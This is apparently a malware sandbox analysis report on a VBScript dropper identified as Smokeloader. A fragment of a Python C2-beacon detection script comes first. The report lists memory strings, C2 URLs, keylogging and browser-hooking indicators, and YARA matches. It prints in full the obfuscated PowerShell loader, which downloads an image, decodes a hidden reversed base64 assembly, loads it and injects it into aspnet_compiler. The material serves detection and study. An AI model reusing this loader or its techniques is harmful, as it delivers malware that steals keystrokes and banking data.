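        if len(body) >= 4 and struct.unpack("<I", body[:4])[0] == len(body) - 4:
            reasons.append("body is length-prefixed (as in the 115-byte replies above)")
    return reasons


if __name__ == "__main__":
    for raw in (BEACON_1, STAGE_GET):
        req = parse_request(raw)
        print(req["method"], req["path"], beacon_reasons(req))
    print("HTML 404:", response_reasons(404, HTML_404))
    print("binary 404:", response_reasons(404, BINARY_404))
```

The User-Agent check is deliberately reported as weak: it is a real IE11 string, so on its own it only corroborates the other indicators. The response check is the one that matters for hunting, because a proxy log that records only status codes will show these C2 exchanges as harmless 404s.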
Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000000E.00000002.1757266577.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/
Source: explorer.exe, 0000000E.00000002.1757266577.0000000000D26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/O
Source: explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 0000000E.00000002.1757266577.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1730709154.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.1746568361.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2525393447.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.1941068248.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2524671592.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2524396685.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2524911167.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2524250168.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/index.php
Source: explorer.exe, 0000000E.00000002.1757266577.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1730709154.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.1746568361.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2525393447.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.1941068248.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2524671592.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2524396685.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2524911167.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2524250168.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
Source: explorer.exe, 0000000E.00000002.1757266577.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/ndex.php
Source: explorer.exe, 0000000C.00000000.1506335410.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506356157.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1505560118.0000000007C70000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000002.00000002.1453214012.000001478A7E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000C.00000000.1509467961.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.1765549035.000000000C44D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071B2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: powershell.exe, 00000002.00000002.1453214012.000001478A7E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: explorer.exe, 0000000C.00000000.1506729663.000000000913F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000C.00000000.1504447706.0000000007276000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbs | String found in binary or memory: https://github.com/koswald/VBScript
Source: wscript.exe, 00000000.00000003.1226786106.00000148B37CF000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood.tIF.vbs | String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
Source: wscript.exe, 00000000.00000003.1223863747.00000148B37CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1224054764.00000148B37CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1226918992.00000148B15AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1227341104.00000148B3441000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1223724844.00000148B3378000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1223795021.00000148B3341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1227807236.00000148B3551000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1226786106.00000148B37CF000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood.tIF.vbs | String found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
            Source: explorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
            Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
            Source: powershell.exe, 00000002.00000002.1452333990.000001478891E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/
            Source: powershell.exe, 00000002.00000002.1453088771.0000014788B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg
            Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgX
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000C.00000000.1506729663.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
            Source: explorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match | File source: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2908, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3988, type: MEMORYSTR
            Source: Yara match | File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_001B162B GetKeyboardState,ToUnicode,26_2_001B162B

            E-Banking Fraud

            Source: C:\Windows\SysWOW64\explorer.exe | Code function: StrStrIA, chrome.exe|opera.exe|msedge.exe18_2_00162EA8
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe18_2_00163862
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe18_2_00163862
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe18_2_00163862
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe18_2_00163862

            System Summary

            Source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: Process Memory Space: powershell.exe PID: 5128, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Initial file: Dim cmd 'string: ShellExecute arg #1
            Source: Initial file: Dim args 'string: ShellExecute arg #2
            Source: Initial file: Dim pwd 'string: ShellExecute arg #3
            Source: Initial file: Dim privileges 'string: ShellExecute arg #4
            Source: Initial file: .ShellExecute cmd, args, pwd, privileges
            Source: Initial file: Dim cmd 'string: ShellExecute arg #1
            Source: Initial file: 'Class scope: args_ 'string: ShellExecute arg #2
            Source: Initial file: Dim pwd 'string: ShellExecute arg #3
            Source: Initial file: Dim privileges 'string: ShellExecute arg #4
            Source: Initial file: .ShellExecute cmd, args_, pwd, privileges
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } 
else { Write-Output 'PowerShell version Not available' };"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_00402F5D RtlCreateUserThread,NtTerminateProcess,11_2_00402F5D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004014BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,11_2_00402321
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004025D3 NtClose,11_2_004025D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004014D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,11_2_004022D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,11_2_004022D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,11_2_004022E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004014E8
